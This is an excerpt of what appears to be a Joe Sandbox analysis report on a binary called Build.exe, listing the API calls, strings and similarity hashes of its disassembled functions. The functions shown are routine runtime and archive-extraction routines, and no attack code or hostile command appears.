                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 5678e2f5396ac50c83cecd5a3b87833d73b53a894f95811d597087edbdf11527
                                                                                                    • Instruction ID: 0c423cc6d644da4c41dbc65cd728f830df300333282b1f0ffd7d0aa00fe399b2
                                                                                                    • Opcode Fuzzy Hash: 5678e2f5396ac50c83cecd5a3b87833d73b53a894f95811d597087edbdf11527
                                                                                                    • Instruction Fuzzy Hash: 3801DF726096117F2B2157BB6C89C7B6A6DFEC2BAA3140129B905C3201FE648D02A2B0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,0094BC80,0094D7D8,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094BA2E
                                                                                                    • _free.LIBCMT ref: 0094BA63
                                                                                                    • _free.LIBCMT ref: 0094BA8A
                                                                                                    • SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA97
                                                                                                    • SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BAA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: cb824396ff76bc5d26cfddde2e2a2d7a68a195b44594ae2db10453850599b421
                                                                                                    • Instruction ID: bb6c4fd01b843dfc6cf822c7425061ef0777d705be8df6dde7ed5425d992fef8
                                                                                                    • Opcode Fuzzy Hash: cb824396ff76bc5d26cfddde2e2a2d7a68a195b44594ae2db10453850599b421
                                                                                                    • Instruction Fuzzy Hash: 9301F436209B01AB8616A7365D86F6B21EEDBC13767200928F51993291EF65CC026220
                                                                                                    APIs
                                                                                                      • Part of subcall function 009332AF: ResetEvent.KERNEL32(?), ref: 009332C1
                                                                                                      • Part of subcall function 009332AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009332D5
                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000,1C667296,?,?,00000001,?,009552FF,000000FF,?,009343C0,?,00000000,?,00924766), ref: 00933007
                                                                                                    • CloseHandle.KERNEL32(?,?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001), ref: 00933021
                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 0093303A
                                                                                                    • CloseHandle.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 00933046
                                                                                                    • CloseHandle.KERNEL32(?,?,009343C0,?,00000000,?,00924766,?,?,?,00000000,?,?,?,00000001,?), ref: 00933052
                                                                                                      • Part of subcall function 009330CA: WaitForSingleObject.KERNEL32(?,000000FF,009331E7,?,?,0093325F,?,?,?,?,?,00933249), ref: 009330D0
                                                                                                      • Part of subcall function 009330CA: GetLastError.KERNEL32(?,?,0093325F,?,?,?,?,?,00933249), ref: 009330DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1868215902-0
                                                                                                    • Opcode ID: 9bec4fa22d43c10494a8f4a387903d4f77748dbe2da061735d972738d4bc0da3
                                                                                                    • Instruction ID: 225358b6a11864896a4e563e68bef297ae59412e5409e8d4d1d0c0601da9c507
                                                                                                    • Opcode Fuzzy Hash: 9bec4fa22d43c10494a8f4a387903d4f77748dbe2da061735d972738d4bc0da3
                                                                                                    • Instruction Fuzzy Hash: F611AD72404B44EFC7229F76DC84BC6BBA9FB08712F404929E16AA31A0CB757A049B50
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0094EE67
                                                                                                      • Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
                                                                                                      • Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22
                                                                                                    • _free.LIBCMT ref: 0094EE79
                                                                                                    • _free.LIBCMT ref: 0094EE8B
                                                                                                    • _free.LIBCMT ref: 0094EE9D
                                                                                                    • _free.LIBCMT ref: 0094EEAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 0f66a55dfbe51a7ebc5a2c2830325793856f059f54ba02d535998bd5f9890008
                                                                                                    • Instruction ID: 15f681b1ba0d56a3cd48eb2d76fcd395d86b35d17b29e42250feeca14afcc912
                                                                                                    • Opcode Fuzzy Hash: 0f66a55dfbe51a7ebc5a2c2830325793856f059f54ba02d535998bd5f9890008
                                                                                                    • Instruction Fuzzy Hash: 37F03032518600EFC765EB69F886D9B77EEBA407107640C1AF14ED7940CFB1FC808A64
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0094B17E
                                                                                                      • Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
                                                                                                      • Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22
                                                                                                    • _free.LIBCMT ref: 0094B190
                                                                                                    • _free.LIBCMT ref: 0094B1A3
                                                                                                    • _free.LIBCMT ref: 0094B1B4
                                                                                                    • _free.LIBCMT ref: 0094B1C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 07842b49681e7b7070ae13d59e21f250ae2fcc1071d3e091266a52037c807424
                                                                                                    • Instruction ID: fbb415b06a9ceaf217696d65c94f6c68de3b02c6172e39776e2f2540f88726e6
                                                                                                    • Opcode Fuzzy Hash: 07842b49681e7b7070ae13d59e21f250ae2fcc1071d3e091266a52037c807424
                                                                                                    • Instruction Fuzzy Hash: BEF0B77082C6209BCA52AF15EC019883BB5FB54725301465AF5269B361CBB78842AFD1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _swprintf
                                                                                                    • String ID: %ls$%s: %s
                                                                                                    • API String ID: 589789837-2259941744
                                                                                                    • Opcode ID: 8743ced6c0bbd9a0676b361964e5086aa1ac6af7ece1882fc18acd9c7921e2dd
                                                                                                    • Instruction ID: c78dd454773ded60b88cffa79493757800f9f8c9e39ff260ed081ad6fda24ee9
                                                                                                    • Opcode Fuzzy Hash: 8743ced6c0bbd9a0676b361964e5086aa1ac6af7ece1882fc18acd9c7921e2dd
                                                                                                    • Instruction Fuzzy Hash: 9951DCB52C8305FAF6215B948D42F3AB6A9AB45F00F20CD07F7CB640E1C6A59750AF56
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe,00000104), ref: 0094A800
                                                                                                    • _free.LIBCMT ref: 0094A8CB
                                                                                                    • _free.LIBCMT ref: 0094A8D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
                                                                                                    • API String ID: 2506810119-2276182090
                                                                                                    • Opcode ID: 6c3f02056e157c18cda6b15f791bf106972dc8aa4f393f9a9f5b3400eddf147e
                                                                                                    • Instruction ID: 229edc265f5b2984655f6ce01aa6264f5443fbd72ec7a677371e9486e770b48a
                                                                                                    • Opcode Fuzzy Hash: 6c3f02056e157c18cda6b15f791bf106972dc8aa4f393f9a9f5b3400eddf147e
                                                                                                    • Instruction Fuzzy Hash: 3D315E71A44218EFDB21DF99DC85E9EBBFCEB85310F14406AF9049B311D6748E42DBA2
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0094581B
                                                                                                    • _abort.LIBCMT ref: 00945926
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer_abort
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 948111806-2084237596
                                                                                                    • Opcode ID: e6242152112e82acb325bd1ac8fb151f50c5e317f30ce141094d73b0a45032fd
                                                                                                    • Instruction ID: b4396bb6628ad7f331dd494cc52fa8dfcd2e628e5c563df1f3e180414223457d
                                                                                                    • Opcode Fuzzy Hash: e6242152112e82acb325bd1ac8fb151f50c5e317f30ce141094d73b0a45032fd
                                                                                                    • Instruction Fuzzy Hash: 05412871900609EFCF15DF98CC81EAEBBB9FF48314F5A8459F904A7212D735A960DB50
                                                                                                    APIs
                                                                                                    • __fprintf_l.LIBCMT ref: 0092F82D
                                                                                                    • _strncpy.LIBCMT ref: 0092F871
                                                                                                      • Part of subcall function 00933F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0092F801,00000000,00000000,?,00965070,?,0092F801,?,?,00000050,?), ref: 00933F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                    • String ID: $%s$@%s
                                                                                                    • API String ID: 562999700-834177443
                                                                                                    • Opcode ID: 37b3b55b4a6d1dbe1998de4de60695c39f7764a634407b3109558f96f261bc10
                                                                                                    • Instruction ID: 5e301e35f595da0688d1f058acb244609a290c8d00fce203d9d955c8b2d2f63c
                                                                                                    • Opcode Fuzzy Hash: 37b3b55b4a6d1dbe1998de4de60695c39f7764a634407b3109558f96f261bc10
                                                                                                    • Instruction Fuzzy Hash: 01218C729003589BEB20DFA4DC11FAEB7BCBB45700F44053AFA2293191E771E9088B50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                      • Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0093CE28
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0093CE3D
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0093CE52
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: ASKNEXTVOL
                                                                                                    • API String ID: 445417207-3402441367
                                                                                                    • Opcode ID: 79cae521865577a80c61a428d9bd8e2c6216cf73fdd30ecb0e585743f6b76222
                                                                                                    • Instruction ID: aa9043ca76c069098106ceee4bff061549bfed3f5b8cf307a8fb876900f67117
                                                                                                    • Opcode Fuzzy Hash: 79cae521865577a80c61a428d9bd8e2c6216cf73fdd30ecb0e585743f6b76222
                                                                                                    • Instruction Fuzzy Hash: D611E973248A14BFD2219F68DC09F677B6DFB4AB40F000410F651BB2A4C761AD05AF65
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F61
                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F6B
                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F7B
                                                                                                    Strings
                                                                                                    • Thread pool initialization failed., xrefs: 00932F93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                    • Opcode ID: 9ac9b46e9e98b96b46b893e9307c7ea8dd7c5d4604171e459db3a1c2ccafec61
                                                                                                    • Instruction ID: 7ae80b22cf4e641de4aa0463934a634a706cb4fef090166ba9f00425d1b29367
                                                                                                    • Opcode Fuzzy Hash: 9ac9b46e9e98b96b46b893e9307c7ea8dd7c5d4604171e459db3a1c2ccafec61
                                                                                                    • Instruction Fuzzy Hash: 91115EB1608709AFD3215F7B9C84AA7FBECEB95755F60482EF1DAC3240D6B159408BA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                    • API String ID: 0-56093855
                                                                                                    • Opcode ID: 910be284a76f54d14a4151e8f23766668df2b9490a6e05ebd74d9a0cae225fa7
                                                                                                    • Instruction ID: 0b555949b24ee522e8d3285a66cf25ce19f3e5dac25d76c33e7e8aa6ee4559fa
                                                                                                    • Opcode Fuzzy Hash: 910be284a76f54d14a4151e8f23766668df2b9490a6e05ebd74d9a0cae225fa7
                                                                                                    • Instruction Fuzzy Hash: C701BC7261C244AFDB118F65EC44F767BA8EB89784F100429FA49A3270C6B18850EBA0
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00924B42
                                                                                                      • Part of subcall function 0094106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00941079
                                                                                                      • Part of subcall function 0094106D: ___delayLoadHelper2@8.DELAYIMP ref: 0094109F
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00924B4D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                                    • String ID: string too long$vector too long
                                                                                                    • API String ID: 2355824318-1617939282
                                                                                                    • Opcode ID: 39bed973e6a8cf9f7ba9e9c1afe418127617c4976fdae5642051fc540bce44ad
                                                                                                    • Instruction ID: 1834df14371186d634d608c72e9cded97b06775ea9bc15290cdeedecb359f2e2
                                                                                                    • Opcode Fuzzy Hash: 39bed973e6a8cf9f7ba9e9c1afe418127617c4976fdae5642051fc540bce44ad
                                                                                                    • Instruction Fuzzy Hash: 6AF0A031200364AB8A34AF69EC45D4EB3EDEFC4B21710091AF985C3605C3B0E9448BB1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                                    • Instruction ID: 9828f10488b956a4dd063a9d348d4af3f452538b3cc3eac53cf7c4f2d7f19780
